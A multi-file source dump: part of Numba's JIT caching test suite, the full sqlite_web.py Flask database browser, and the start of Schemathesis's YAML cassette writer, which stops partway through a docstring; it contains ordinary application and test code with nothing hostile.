self.check_pycache(0)
mod = self.import_module()
self.check_pycache(0)
f = mod.add_usecase
self.assertPreciseEqual(f(2, 3), 6)
self.check_pycache(2) # 1 index, 1 data
self.assertPreciseEqual(f(2.5, 3), 6.5)
self.check_pycache(3) # 1 index, 2 data
self.check_hits(f, 0, 2)
f = mod.add_objmode_usecase
self.assertPreciseEqual(f(2, 3), 6)
self.check_pycache(5) # 2 index, 3 data
self.assertPreciseEqual(f(2.5, 3), 6.5)
self.check_pycache(6) # 2 index, 4 data
self.check_hits(f, 0, 2)
f = mod.record_return
rec = f(mod.aligned_arr, 1)
self.assertPreciseEqual(tuple(rec), (2, 43.5))
rec = f(mod.packed_arr, 1)
self.assertPreciseEqual(tuple(rec), (2, 43.5))
self.check_pycache(9) # 3 index, 6 data
self.check_hits(f, 0, 2)
f = mod.generated_usecase
self.assertPreciseEqual(f(3, 2), 1)
self.assertPreciseEqual(f(3j, 2), 2 + 3j)
# Check the code runs ok from another process
self.run_in_separate_process()
def test_inner_then_outer(self):
# Caching inner then outer function is ok
mod = self.import_module()
self.assertPreciseEqual(mod.inner(3, 2), 6)
self.check_pycache(2) # 1 index, 1 data
# Uncached outer function shouldn't fail (issue #1603)
f = mod.outer_uncached
self.assertPreciseEqual(f(3, 2), 2)
self.check_pycache(2) # 1 index, 1 data
mod = self.import_module()
f = mod.outer_uncached
self.assertPreciseEqual(f(3, 2), 2)
self.check_pycache(2) # 1 index, 1 data
# Cached outer will create new cache entries
f = mod.outer
self.assertPreciseEqual(f(3, 2), 2)
self.check_pycache(4) # 2 index, 2 data
self.assertPreciseEqual(f(3.5, 2), 2.5)
self.check_pycache(6) # 2 index, 4 data
def test_outer_then_inner(self):
# Caching outer then inner function is ok
mod = self.import_module()
self.assertPreciseEqual(mod.outer(3, 2), 2)
self.check_pycache(4) # 2 index, 2 data
self.assertPreciseEqual(mod.outer_uncached(3, 2), 2)
self.check_pycache(4) # same
mod = self.import_module()
f = mod.inner
self.assertPreciseEqual(f(3, 2), 6)
self.check_pycache(4) # same
self.assertPreciseEqual(f(3.5, 2), 6.5)
self.check_pycache(5) # 2 index, 3 data
def test_no_caching(self):
mod = self.import_module()
f = mod.add_nocache_usecase
self.assertPreciseEqual(f(2, 3), 6)
self.check_pycache(0)
def test_looplifted(self):
# Loop-lifted functions can't be cached and raise a warning
mod = self.import_module()
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter('always', NumbaWarning)
f = mod.looplifted
self.assertPreciseEqual(f(4), 6)
self.check_pycache(0)
self.assertEqual(len(w), 1)
self.assertEqual(str(w[0].message),
'Cannot cache compiled function "looplifted" '
'as it uses lifted loops')
def test_big_array(self):
# Code references big array globals cannot be cached
mod = self.import_module()
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter('always', NumbaWarning)
f = mod.use_big_array
np.testing.assert_equal(f(), mod.biggie)
self.check_pycache(0)
self.assertEqual(len(w), 1)
self.assertIn('Cannot cache compiled function "use_big_array" '
'as it uses dynamic globals', str(w[0].message))
def test_ctypes(self):
# Functions using a ctypes pointer can't be cached and raise
# a warning.
mod = self.import_module()
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter('always', NumbaWarning)
f = mod.use_c_sin
self.assertPreciseEqual(f(0.0), 0.0)
self.check_pycache(0)
self.assertEqual(len(w), 1)
self.assertIn('Cannot cache compiled function "use_c_sin"',
str(w[0].message))
def test_closure(self):
mod = self.import_module()
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter('always', NumbaWarning)
f = mod.closure1
self.assertPreciseEqual(f(3), 6)
f = mod.closure2
self.assertPreciseEqual(f(3), 8)
self.check_pycache(0)
self.assertEqual(len(w), 2)
for item in w:
self.assertIn('Cannot cache compiled function "closure"',
str(item.message))
def test_cache_reuse(self):
mod = self.import_module()
mod.add_usecase(2, 3)
mod.add_usecase(2.5, 3.5)
mod.add_objmode_usecase(2, 3)
mod.outer_uncached(2, 3)
mod.outer(2, 3)
mod.record_return(mod.packed_arr, 0)
mod.record_return(mod.aligned_arr, 1)
mod.generated_usecase(2, 3)
mtimes = self.get_cache_mtimes()
# Two signatures compiled
self.check_hits(mod.add_usecase, 0, 2)
mod2 = self.import_module()
self.assertIsNot(mod, mod2)
f = mod2.add_usecase
f(2, 3)
self.check_hits(f, 1, 0)
f(2.5, 3.5)
self.check_hits(f, 2, 0)
f = mod2.add_objmode_usecase
f(2, 3)
self.check_hits(f, 1, 0)
# The files haven't changed
self.assertEqual(self.get_cache_mtimes(), mtimes)
self.run_in_separate_process()
self.assertEqual(self.get_cache_mtimes(), mtimes)
def test_cache_invalidate(self):
mod = self.import_module()
f = mod.add_usecase
self.assertPreciseEqual(f(2, 3), 6)
# This should change the functions' results
with open(self.modfile, "a") as f:
f.write("\nZ = 10\n")
mod = self.import_module()
f = mod.add_usecase
self.assertPreciseEqual(f(2, 3), 15)
f = mod.add_objmode_usecase
self.assertPreciseEqual(f(2, 3), 15)
def test_recompile(self):
# Explicit call to recompile() should overwrite the cache
mod = self.import_module()
f = mod.add_usecase
self.assertPreciseEqual(f(2, 3), 6)
mod = self.import_module()
f = mod.add_usecase
mod.Z = 10
self.assertPreciseEqual(f(2, 3), 6)
f.recompile()
self.assertPreciseEqual(f(2, 3), 15)
# Freshly recompiled version is re-used from other imports
mod = self.import_module()
f = mod.add_usecase
self.assertPreciseEqual(f(2, 3), 15)
def test_same_names(self):
# Function with the same names should still disambiguate
mod = self.import_module()
f = mod.renamed_function1
self.assertPreciseEqual(f(2), 4)
f = mod.renamed_function2
self.assertPreciseEqual(f(2), 8)
def _test_pycache_fallback(self):
"""
With a disabled __pycache__, test there is a working fallback
(e.g. on the user-wide cache dir)
"""
mod = self.import_module()
f = mod.add_usecase
# Remove this function's cache files at the end, to avoid accumulation
# accross test calls.
self.addCleanup(shutil.rmtree, f.stats.cache_path, ignore_errors=True)
self.assertPreciseEqual(f(2, 3), 6)
# It's a cache miss since the file was copied to a new temp location
self.check_hits(f, 0, 1)
# Test re-use
mod2 = self.import_module()
f = mod2.add_usecase
self.assertPreciseEqual(f(2, 3), 6)
self.check_hits(f, 1, 0)
# The __pycache__ is empty (otherwise the test's preconditions
# wouldn't be met)
self.check_pycache(0)
@unittest.skipIf(os.name == "nt",
"cannot easily make a directory read-only on Windows")
def test_non_creatable_pycache(self):
# Make it impossible to create the __pycache__ directory
old_perms = os.stat(self.tempdir).st_mode
os.chmod(self.tempdir, 0o500)
self.addCleanup(os.chmod, self.tempdir, old_perms)
self._test_pycache_fallback()
@unittest.skipIf(os.name == "nt",
"cannot easily make a directory read-only on Windows")
def test_non_writable_pycache(self):
# Make it impossible to write to the __pycache__ directory
pycache = os.path.join(self.tempdir, '__pycache__')
os.mkdir(pycache)
old_perms = os.stat(pycache).st_mode
os.chmod(pycache, 0o500)
self.addCleanup(os.chmod, pycache, old_perms)
self._test_pycache_fallback()
def test_ipython(self):
# Test caching in an IPython session
base_cmd = [sys.executable, '-m', 'IPython']
base_cmd += ['--quiet', '--quick', '--no-banner', '--colors=NoColor']
try:
ver = subprocess.check_output(base_cmd + ['--version'])
except subprocess.CalledProcessError as e:
self.skipTest("ipython not available: return code %d"
% e.returncode)
ver = ver.strip().decode()
print("ipython version:", ver)
# Create test input
inputfn = os.path.join(self.tempdir, "ipython_cache_usecase.txt")
with open(inputfn, "w") as f:
f.write(r"""
import os
import sys
from numba import jit
# IPython 5 does not support multiline input if stdin isn't
# a tty (https://github.com/ipython/ipython/issues/9752)
f = jit(cache=True)(lambda: 42)
res = f()
# IPython writes on stdout, so use stderr instead
sys.stderr.write(u"cache hits = %d\n" % f.stats.cache_hits[()])
# IPython hijacks sys.exit(), bypass it
sys.stdout.flush()
sys.stderr.flush()
os._exit(res)
""")
def execute_with_input():
# Feed the test input as stdin, to execute it in REPL context
with open(inputfn, "rb") as stdin:
p = subprocess.Popen(base_cmd, stdin=stdin,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
universal_newlines=True)
out, err = p.communicate()
if p.returncode != 42:
self.fail("unexpected return code %d\n"
"-- stdout:\n%s\n"
"-- stderr:\n%s\n"
% (p.returncode, out, err))
return err
execute_with_input()
# Run a second time and check caching
err = execute_with_input()
self.assertEqual(err.strip(), "cache hits = 1")
class TestMultiprocessCache(BaseCacheTest):
# Nested multiprocessing.Pool raises AssertionError:
# "daemonic processes are not allowed to have children"
_numba_parallel_test_ = False
here = os.path.dirname(__file__)
usecases_file = os.path.join(here, "cache_usecases.py")
modname = "dispatcher_caching_test_fodder"
def test_multiprocessing(self):
# Check caching works from multiple processes at once (#2028)
mod = self.import_module()
# Calling a pure Python caller of the JIT-compiled function is
# necessary to reproduce the issue.
f = mod.simple_usecase_caller
n = 3
try:
ctx = multiprocessing.get_context('spawn')
except AttributeError:
ctx = multiprocessing
pool = ctx.Pool(n)
try:
res = sum(pool.imap(f, range(n)))
finally:
pool.close()
self.assertEqual(res, n * (n - 1) // 2)
if __name__ == '__main__':
unittest.main()
|
sqlite_web.py
|
#!/usr/bin/env python
import datetime
import math
import operator
import optparse
import os
import re
import sys
import threading
import time
import webbrowser
from collections import namedtuple, OrderedDict
from functools import wraps
from getpass import getpass
from io import TextIOWrapper
# Py2k compat.
if sys.version_info[0] == 2:
PY2 = True
binary_types = (buffer, bytes, bytearray)
decode_handler = 'replace'
numeric = (int, long, float)
unicode_type = unicode
from StringIO import StringIO
else:
PY2 = False
binary_types = (bytes, bytearray)
decode_handler = 'backslashreplace'
numeric = (int, float)
unicode_type = str
from io import StringIO
try:
from flask import (
Flask, abort, escape, flash, jsonify, make_response, Markup, redirect,
render_template, request, session, url_for)
except ImportError:
raise RuntimeError('Unable to import flask module. Install by running '
'pip install flask')
try:
from pygments import formatters, highlight, lexers
except ImportError:
import warnings
warnings.warn('pygments library not found.', ImportWarning)
syntax_highlight = lambda data: '<pre>%s</pre>' % data
else:
def syntax_highlight(data):
if not data:
return ''
lexer = lexers.get_lexer_by_name('sql')
formatter = formatters.HtmlFormatter(linenos=False)
return highlight(data, lexer, formatter)
try:
from peewee import __version__
peewee_version = tuple([int(p) for p in __version__.split('.')])
except ImportError:
raise RuntimeError('Unable to import peewee module. Install by running '
'pip install peewee')
else:
if peewee_version <= (3, 0, 0):
raise RuntimeError('Peewee >= 3.0.0 is required. Found version %s. '
'Please update by running pip install --update '
'peewee' % __version__)
from peewee import *
from peewee import IndexMetadata
from peewee import sqlite3
from playhouse.dataset import DataSet
from playhouse.migrate import migrate
CUR_DIR = os.path.realpath(os.path.dirname(__file__))
DEBUG = False
MAX_RESULT_SIZE = 1000
ROWS_PER_PAGE = 50
SECRET_KEY = 'sqlite-database-browser-0.1.0'
app = Flask(
__name__,
static_folder=os.path.join(CUR_DIR, 'static'),
template_folder=os.path.join(CUR_DIR, 'templates'))
app.config.from_object(__name__)
dataset = None
migrator = None
#
# Database metadata objects.
#
TriggerMetadata = namedtuple('TriggerMetadata', ('name', 'sql'))
ViewMetadata = namedtuple('ViewMetadata', ('name', 'sql'))
#
# Database helpers.
#
class SqliteDataSet(DataSet):
@property
def filename(self):
db_file = dataset._database.database
if db_file.startswith('file:'):
db_file = db_file[5:]
return os.path.realpath(db_file.rsplit('?', 1)[0])
@property
def is_readonly(self):
db_file = dataset._database.database
return db_file.endswith('?mode=ro')
@property
def base_name(self):
return os.path.basename(self.filename)
@property
def created(self):
stat = os.stat(self.filename)
return datetime.datetime.fromtimestamp(stat.st_ctime)
@property
def modified(self):
stat = os.stat(self.filename)
return datetime.datetime.fromtimestamp(stat.st_mtime)
@property
def size_on_disk(self):
stat = os.stat(self.filename)
return stat.st_size
def get_indexes(self, table):
return dataset._database.get_indexes(table)
def get_all_indexes(self):
cursor = self.query(
'SELECT name, sql FROM sqlite_master '
'WHERE type = ? ORDER BY name',
('index',))
return [IndexMetadata(row[0], row[1], None, None, None)
for row in cursor.fetchall()]
def get_columns(self, table):
return dataset._database.get_columns(table)
def get_foreign_keys(self, table):
return dataset._database.get_foreign_keys(table)
def get_triggers(self, table):
cursor = self.query(
'SELECT name, sql FROM sqlite_master '
'WHERE type = ? AND tbl_name = ?',
('trigger', table))
return [TriggerMetadata(*row) for row in cursor.fetchall()]
def get_all_triggers(self):
cursor = self.query(
'SELECT name, sql FROM sqlite_master '
'WHERE type = ? ORDER BY name',
('trigger',))
return [TriggerMetadata(*row) for row in cursor.fetchall()]
def get_all_views(self):
cursor = self.query(
'SELECT name, sql FROM sqlite_master '
'WHERE type = ? ORDER BY name',
('view',))
return [ViewMetadata(*row) for row in cursor.fetchall()]
def get_virtual_tables(self):
cursor = self.query(
'SELECT name FROM sqlite_master '
'WHERE type = ? AND sql LIKE ? '
'ORDER BY name',
('table', 'CREATE VIRTUAL TABLE%'))
return set([row[0] for row in cursor.fetchall()])
def get_corollary_virtual_tables(self):
virtual_tables = self.get_virtual_tables()
suffixes = ['content', 'docsize', 'segdir', 'segments', 'stat']
return set(
'%s_%s' % (virtual_table, suffix) for suffix in suffixes
for virtual_table in virtual_tables)
#
# Flask views.
#
@app.route('/')
def index():
return render_template('index.html', sqlite=sqlite3)
@app.route('/login/', methods=['GET', 'POST'])
def login():
if request.method == 'POST':
if request.form.get('password') == app.config['PASSWORD']:
session['authorized'] = True
return redirect(session.get('next_url') or url_for('index'))
flash('The password you entered is incorrect.', 'danger')
return render_template('login.html')
@app.route('/logout/', methods=['GET'])
def logout():
session.pop('authorized', None)
return redirect(url_for('login'))
def require_table(fn):
@wraps(fn)
def inner(table, *args, **kwargs):
if table not in dataset.tables:
abort(404)
return fn(table, *args, **kwargs)
return inner
@app.route('/create-table/', methods=['POST'])
def table_create():
table = (request.form.get('table_name') or '').strip()
if not table:
flash('Table name is required.', 'danger')
return redirect(request.form.get('redirect') or url_for('index'))
dataset[table]
return redirect(url_for('table_import', table=table))
@app.route('/<table>/')
@require_table
def table_structure(table):
ds_table = dataset[table]
model_class = ds_table.model_class
table_sql = dataset.query(
'SELECT sql FROM sqlite_master WHERE tbl_name = ? AND type = ?',
[table, 'table']).fetchone()[0]
return render_template(
'table_structure.html',
columns=dataset.get_columns(table),
ds_table=ds_table,
foreign_keys=dataset.get_foreign_keys(table),
indexes=dataset.get_indexes(table),
model_class=model_class,
table=table,
table_sql=table_sql,
triggers=dataset.get_triggers(table))
def get_request_data():
if request.method == 'POST':
return request.form
return request.args
@app.route('/<table>/add-column/', methods=['GET', 'POST'])
@require_table
def add_column(table):
column_mapping = OrderedDict((
('VARCHAR', CharField),
('TEXT', TextField),
('INTEGER', IntegerField),
('REAL', FloatField),
('BOOL', BooleanField),
('BLOB', BlobField),
('DATETIME', DateTimeField),
('DATE', DateField),
('TIME', TimeField),
('DECIMAL', DecimalField)))
request_data = get_request_data()
col_type = request_data.get('type')
name = request_data.get('name', '')
if request.method == 'POST':
if name and col_type in column_mapping:
migrate(
migrator.add_column(
table,
name,
column_mapping[col_type](null=True)))
flash('Column "%s" was added successfully!' % name, 'success')
dataset.update_cache(table)
return redirect(url_for('table_structure', table=table))
else:
flash('Name and column type are required.', 'danger')
return render_template(
'add_column.html',
col_type=col_type,
column_mapping=column_mapping,
name=name,
table=table)
@app.route('/<table>/drop-column/', methods=['GET', 'POST'])
@require_table
def drop_column(table):
request_data = get_request_data()
name = request_data.get('name', '')
columns = dataset.get_columns(table)
column_names = [column.name for column in columns]
if request.method == 'POST':
if name in column_names:
migrate(migrator.drop_column(table, name))
flash('Column "%s" was dropped successfully!' % name, 'success')
dataset.update_cache(table)
return redirect(url_for('table_structure', table=table))
else:
flash('Name is required.', 'danger')
return render_template(
'drop_column.html',
columns=columns,
column_names=column_names,
name=name,
table=table)
@app.route('/<table>/rename-column/', methods=['GET', 'POST'])
@require_table
def rename_column(table):
request_data = get_request_data()
rename = request_data.get('rename', '')
rename_to = request_data.get('rename_to', '')
columns = dataset.get_columns(table)
column_names = [column.name for column in columns]
if request.method == 'POST':
if (rename in column_names) and (rename_to not in column_names):
migrate(migrator.rename_column(table, rename, rename_to))
flash('Column "%s" was renamed successfully!' % rename, 'success')
dataset.update_cache(table)
return redirect(url_for('table_structure', table=table))
else:
flash('Column name is required and cannot conflict with an '
'existing column\'s name.', 'danger')
return render_template(
'rename_column.html',
columns=columns,
column_names=column_names,
rename=rename,
rename_to=rename_to,
table=table)
@app.route('/<table>/add-index/', methods=['GET', 'POST'])
@require_table
def add_index(table):
request_data = get_request_data()
indexed_columns = request_data.getlist('indexed_columns')
unique = bool(request_data.get('unique'))
columns = dataset.get_columns(table)
if request.method == 'POST':
if indexed_columns:
migrate(
migrator.add_index(
table,
indexed_columns,
unique))
flash('Index created successfully.', 'success')
return redirect(url_for('table_structure', table=table))
else:
flash('One or more columns must be selected.', 'danger')
return render_template(
'add_index.html',
columns=columns,
indexed_columns=indexed_columns,
table=table,
unique=unique)
@app.route('/<table>/drop-index/', methods=['GET', 'POST'])
@require_table
def drop_index(table):
request_data = get_request_data()
name = request_data.get('name', '')
indexes = dataset.get_indexes(table)
index_names = [index.name for index in indexes]
if request.method == 'POST':
if name in index_names:
migrate(migrator.drop_index(table, name))
flash('Index "%s" was dropped successfully!' % name, 'success')
return redirect(url_for('table_structure', table=table))
else:
flash('Index name is required.', 'danger')
return render_template(
'drop_index.html',
indexes=indexes,
index_names=index_names,
name=name,
table=table)
@app.route('/<table>/drop-trigger/', methods=['GET', 'POST'])
@require_table
def drop_trigger(table):
request_data = get_request_data()
name = request_data.get('name', '')
triggers = dataset.get_triggers(table)
trigger_names = [trigger.name for trigger in triggers]
if request.method == 'POST':
if name in trigger_names:
dataset.query('DROP TRIGGER "%s";' % name)
flash('Trigger "%s" was dropped successfully!' % name, 'success')
return redirect(url_for('table_structure', table=table))
else:
flash('Trigger name is required.', 'danger')
return render_template(
'drop_trigger.html',
triggers=triggers,
trigger_names=trigger_names,
name=name,
table=table)
@app.route('/<table>/content/')
@require_table
def table_content(table):
page_number = request.args.get('page') or ''
page_number = int(page_number) if page_number.isdigit() else 1
dataset.update_cache(table)
ds_table = dataset[table]
total_rows = ds_table.all().count()
rows_per_page = app.config['ROWS_PER_PAGE']
total_pages = int(math.ceil(total_rows / float(rows_per_page)))
# Restrict bounds.
page_number = min(page_number, total_pages)
page_number = max(page_number, 1)
previous_page = page_number - 1 if page_number > 1 else None
next_page = page_number + 1 if page_number < total_pages else None
query = ds_table.all().paginate(page_number, rows_per_page)
ordering = request.args.get('ordering')
if ordering:
field = ds_table.model_class._meta.columns[ordering.lstrip('-')]
if ordering.startswith('-'):
field = field.desc()
query = query.order_by(field)
field_names = ds_table.columns
columns = [f.column_name for f in ds_table.model_class._meta.sorted_fields]
table_sql = dataset.query(
'SELECT sql FROM sqlite_master WHERE tbl_name = ? AND type = ?',
[table, 'table']).fetchone()[0]
return render_template(
'table_content.html',
columns=columns,
ds_table=ds_table,
field_names=field_names,
next_page=next_page,
ordering=ordering,
page=page_number,
previous_page=previous_page,
query=query,
table=table,
total_pages=total_pages,
total_rows=total_rows)
@app.route('/<table>/query/', methods=['GET', 'POST'])
@require_table
def table_query(table):
data = []
data_description = error = row_count = sql = None
if request.method == 'POST':
sql = request.form['sql']
if 'export_json' in request.form:
return export(table, sql, 'json')
elif 'export_csv' in request.form:
return export(table, sql, 'csv')
try:
cursor = dataset.query(sql)
except Exception as exc:
error = str(exc)
else:
data = cursor.fetchall()[:app.config['MAX_RESULT_SIZE']]
data_description = cursor.description
row_count = cursor.rowcount
else:
if request.args.get('sql'):
sql = request.args.get('sql')
else:
sql = 'SELECT *\nFROM "%s"' % (table)
table_sql = dataset.query(
'SELECT sql FROM sqlite_master WHERE tbl_name = ? AND type = ?',
[table, 'table']).fetchone()[0]
return render_template(
'table_query.html',
data=data,
data_description=data_description,
error=error,
query_images=get_query_images(),
row_count=row_count,
sql=sql,
table=table,
table_sql=table_sql)
@app.route('/table-definition/', methods=['POST'])
def set_table_definition_preference():
key = 'show'
show = False
if request.form.get(key) and request.form.get(key) != 'false':
session[key] = show = True
elif key in session:
del session[key]
return jsonify({key: show})
def export(table, sql, export_format):
model_class = dataset[table].model_class
query = model_class.raw(sql).dicts()
buf = StringIO()
if export_format == 'json':
kwargs = {'indent': 2}
filename = '%s-export.json' % table
mimetype = 'text/javascript'
else:
kwargs = {}
filename = '%s-export.csv' % table
mimetype = 'text/csv'
dataset.freeze(query, export_format, file_obj=buf, **kwargs)
response_data = buf.getvalue()
response = make_response(response_data)
response.headers['Content-Length'] = len(response_data)
response.headers['Content-Type'] = mimetype
response.headers['Content-Disposition'] = 'attachment; filename=%s' % (
filename)
response.headers['Expires'] = 0
response.headers['Pragma'] = 'public'
return response
@app.route('/<table>/import/', methods=['GET', 'POST'])
@require_table
def table_import(table):
count = None
request_data = get_request_data()
strict = bool(request_data.get('strict'))
if request.method == 'POST':
file_obj = request.files.get('file')
if not file_obj:
flash('Please select an import file.', 'danger')
elif not file_obj.filename.lower().endswith(('.csv', '.json')):
flash('Unsupported file-type. Must be a .json or .csv file.',
'danger')
else:
if file_obj.filename.lower().endswith('.json'):
format = 'json'
else:
format = 'csv'
# Here we need to translate the file stream. Werkzeug uses a
# spooled temporary file opened in wb+ mode, which is not
# compatible with Python's CSV module. We'd need to reach pretty
# far into Flask's internals to modify this behavior, so instead
# we'll just translate the stream into utf8-decoded unicode.
if not PY2:
try:
stream = TextIOWrapper(file_obj, encoding='utf-8-sig')
except AttributeError:
# The SpooledTemporaryFile used by werkzeug does not
# implement an API that the TextIOWrapper expects, so we'll
# just consume the whole damn thing and decode it.
# Fixed in werkzeug 0.15.
stream = StringIO(file_obj.read().decode('utf-8-sig'))
else:
stream = file_obj.stream
try:
with dataset.transaction():
count = dataset.thaw(
table,
format=format,
file_obj=stream,
strict=strict)
except Exception as exc:
flash('Error importing file: %s' % exc, 'danger')
else:
flash(
'Successfully imported %s objects from %s.' % (
count, file_obj.filename),
'success')
return redirect(url_for('table_content', table=table))
return render_template(
'table_import.html',
count=count,
strict=strict,
table=table)
@app.route('/<table>/drop/', methods=['GET', 'POST'])
@require_table
def drop_table(table):
if request.method == 'POST':
model_class = dataset[table].model_class
model_class.drop_table()
dataset.update_cache() # Update all tables.
flash('Table "%s" dropped successfully.' % table, 'success')
return redirect(url_for('index'))
return render_template('drop_table.html', table=table)
@app.template_filter('format_index')
def format_index(index_sql):
split_regex = re.compile(r'\bon\b', re.I)
if not split_regex.search(index_sql):
return index_sql
create, definition = split_regex.split(index_sql)
return '\nON '.join((create.strip(), definition.strip()))
@app.template_filter('value_filter')
def value_filter(value, max_length=50):
if isinstance(value, numeric):
return value
if isinstance(value, binary_types):
if not isinstance(value, (bytes, bytearray)):
value = bytes(value) # Handle `buffer` type.
value = value.decode('utf-8', decode_handler)
if isinstance(value, unicode_type):
value = escape(value)
if len(value) > max_length:
return ('<span class="truncated">%s</span> '
'<span class="full" style="display:none;">%s</span>'
'<a class="toggle-value" href="#">...</a>') % (
value[:max_length],
value)
return value
column_re = re.compile('(.+?)\((.+)\)', re.S)
column_split_re = re.compile(r'(?:[^,(]|\([^)]*\))+')
def _format_create_table(sql):
create_table, column_list = column_re.search(sql).groups()
columns = [' %s' % column.strip()
for column in column_split_re.findall(column_list)
if column.strip()]
return '%s (\n%s\n)' % (
create_table,
',\n'.join(columns))
@app.template_filter()
def format_create_table(sql):
try:
return _format_create_table(sql)
except:
return sql
@app.template_filter('highlight')
def highlight_filter(data):
return Markup(syntax_highlight(data))
def get_query_images():
accum = []
image_dir = os.path.join(app.static_folder, 'img')
if not os.path.exists(image_dir):
return accum
for filename in sorted(os.listdir(image_dir)):
basename = os.path.splitext(os.path.basename(filename))[0]
parts = basename.split('-')
accum.append((parts, 'img/' + filename))
return accum
#
# Flask application helpers.
#
@app.context_processor
def _general():
return {
'dataset': dataset,
'login_required': bool(app.config.get('PASSWORD')),
}
@app.context_processor
def _now():
return {'now': datetime.datetime.now()}
@app.before_request
def _connect_db():
dataset.connect()
@app.teardown_request
def _close_db(exc):
if not dataset._database.is_closed():
dataset.close()
class PrefixMiddleware(object):
def __init__(self, app, prefix):
self.app = app
self.prefix = '/%s' % prefix.strip('/')
self.prefix_len = len(self.prefix)
def __call__(self, environ, start_response):
if environ['PATH_INFO'].startswith(self.prefix):
environ['PATH_INFO'] = environ['PATH_INFO'][self.prefix_len:]
environ['SCRIPT_NAME'] = self.prefix
return self.app(environ, start_response)
else:
start_response('404', [('Content-Type', 'text/plain')])
return ['URL does not match application prefix.'.encode()]
#
# Script options.
#
def get_option_parser():
parser = optparse.OptionParser()
parser.add_option(
'-p',
'--port',
default=8080,
help='Port for web interface, default=8080',
type='int')
parser.add_option(
'-H',
'--host',
default='127.0.0.1',
help='Host for web interface, default=127.0.0.1')
parser.add_option(
'-d',
'--debug',
action='store_true',
help='Run server in debug mode')
parser.add_option(
'-x',
'--no-browser',
action='store_false',
default=True,
dest='browser',
help='Do not automatically open browser page.')
parser.add_option(
'-P',
'--password',
action='store_true',
dest='prompt_password',
help='Prompt for password to access database browser.')
parser.add_option(
'-r',
'--read-only',
action='store_true',
dest='read_only',
help='Open database in read-only mode.')
parser.add_option(
'-u',
'--url-prefix',
dest='url_prefix',
help='URL prefix for application.')
return parser
def die(msg, exit_code=1):
sys.stderr.write('%s\n' % msg)
sys.stderr.flush()
sys.exit(exit_code)
def open_browser_tab(host, port):
url = 'http://%s:%s/' % (host, port)
def _open_tab(url):
time.sleep(1.5)
webbrowser.open_new_tab(url)
thread = threading.Thread(target=_open_tab, args=(url,))
thread.daemon = True
thread.start()
def install_auth_handler(password):
app.config['PASSWORD'] = password
@app.before_request
def check_password():
if not session.get('authorized') and request.path != '/login/' and \
not request.path.startswith(('/static/', '/favicon')):
flash('You must log-in to view the database browser.', 'danger')
session['next_url'] = request.base_url
return redirect(url_for('login'))
def initialize_app(filename, read_only=False, password=None, url_prefix=None):
global dataset
global migrator
if password:
install_auth_handler(password)
if read_only:
if sys.version_info < (3, 4, 0):
die('Python 3.4.0 or newer is required for read-only access.')
if peewee_version < (3, 5, 1):
die('Peewee 3.5.1 or newer is required for read-only access.')
db = SqliteDatabase('file:%s?mode=ro' % filename, uri=True)
try:
db.connect()
except OperationalError:
die('Unable to open database file in read-only mode. Ensure that '
'the database exists in order to use read-only mode.')
db.close()
dataset = SqliteDataSet(db, bare_fields=True)
else:
dataset = SqliteDataSet('sqlite:///%s' % filename, bare_fields=True)
if url_prefix:
app.wsgi_app = PrefixMiddleware(app.wsgi_app, prefix=url_prefix)
migrator = dataset._migrator
dataset.close()
def main():
# This function exists to act as a console script entry-point.
parser = get_option_parser()
options, args = parser.parse_args()
if not args:
die('Error: missing required path to database file.')
password = None
if options.prompt_password:
if os.environ.get('SQLITE_WEB_PASSWORD'):
password = os.environ['SQLITE_WEB_PASSWORD']
else:
while True:
password = getpass('Enter password: ')
password_confirm = getpass('Confirm password: ')
if password != password_confirm:
print('Passwords did not match!')
else:
break
# Initialize the dataset instance and (optionally) authentication handler.
initialize_app(args[0], options.read_only, password, options.url_prefix)
if options.browser:
open_browser_tab(options.host, options.port)
app.run(host=options.host, port=options.port, debug=options.debug)
if __name__ == '__main__':
main()
|
cassettes.py
|
import base64
import json
import re
import sys
import threading
from queue import Queue
from typing import Any, Dict, Generator, Iterator, List, Optional, cast
import attr
import click
import requests
from requests.cookies import RequestsCookieJar
from requests.structures import CaseInsensitiveDict
from .. import constants
from ..models import Request, Response
from ..runner import events
from ..runner.serialization import SerializedCheck, SerializedInteraction
from ..types import RequestCert
from .context import ExecutionContext
from .handlers import EventHandler
# Wait until the worker terminates
WRITER_WORKER_JOIN_TIMEOUT = 1
@attr.s(slots=True) # pragma: no mutate
class CassetteWriter(EventHandler):
"""Write interactions in a YAML cassette.
A low-level interface is used to write data to YAML file during the test run and reduce the delay at
the end of the test run.
"""
file_handle: click.utils.LazyFile = attr.ib() # pragma: no mutate
queue: Queue = attr.ib(factory=Queue) # pragma: no mutate
worker: threading.Thread = attr.ib(init=False) # pragma: no mutate
def __attrs_post_init__(self) -> None:
self.worker = threading.Thread(target=worker, kwargs={"file_handle": self.file_handle, "queue": self.queue})
self.worker.start()
def handle_event(self, context: ExecutionContext, event: events.ExecutionEvent) -> None:
if isinstance(event, events.Initialized):
# In the beginning we write metadata and start `http_interactions` list
self.queue.put(Initialize())
if isinstance(event, events.AfterExecution):
# Seed is always present at this point, the original Optional[int] type is there because `TestResult`
# instance is created before `seed` is generated on the hypothesis side
seed = cast(int, event.result.seed)
self.queue.put(
Process(
seed=seed,
interactions=event.result.interactions,
)
)
if isinstance(event, events.Finished):
self.shutdown()
def shutdown(self) -> None:
self.queue.put(Finalize())
self._stop_worker()
def _stop_worker(self) -> None:
self.worker.join(WRITER_WORKER_JOIN_TIMEOUT)
@attr.s(slots=True) # pragma: no mutate
class Initialize:
"""Start up, the first message to make preparations before proceeding the input data."""
@attr.s(slots=True) # pragma: no mutate
class Process:
"""A new chunk of data should be processed."""
seed: int = attr.ib() # pragma: no mutate
interactions: List[SerializedInteraction] = attr.ib() # pragma: no mutate
@attr.s(slots=True) # pragma: no mutate
class Finalize:
"""The work is done and there will be no more messages to process."""
def get_command_representation() -> str:
"""Get how Schemathesis was run."""
# It is supposed to be executed from Schemathesis CLI, not via Click's `command.invoke`
if not sys.argv[0].endswith("schemathesis"):
return "<unknown entrypoint>"
args = " ".join(sys.argv[1:])
return f"schemathesis {args}"
def worker(file_handle: click.utils.LazyFile, queue: Queue) -> None:
"""Write YAML to a file in an incremental manner.
This implementation doesn't use `pyyaml` package and composes YAML manually as string due to the following reasons:
- It is much faster. The string-based approach gives only ~2.5% time overhead when `yaml.CDumper` has ~11.2%;
- Implementation complexity. We have a quite simple format where all values are strings, and it is much simpler to
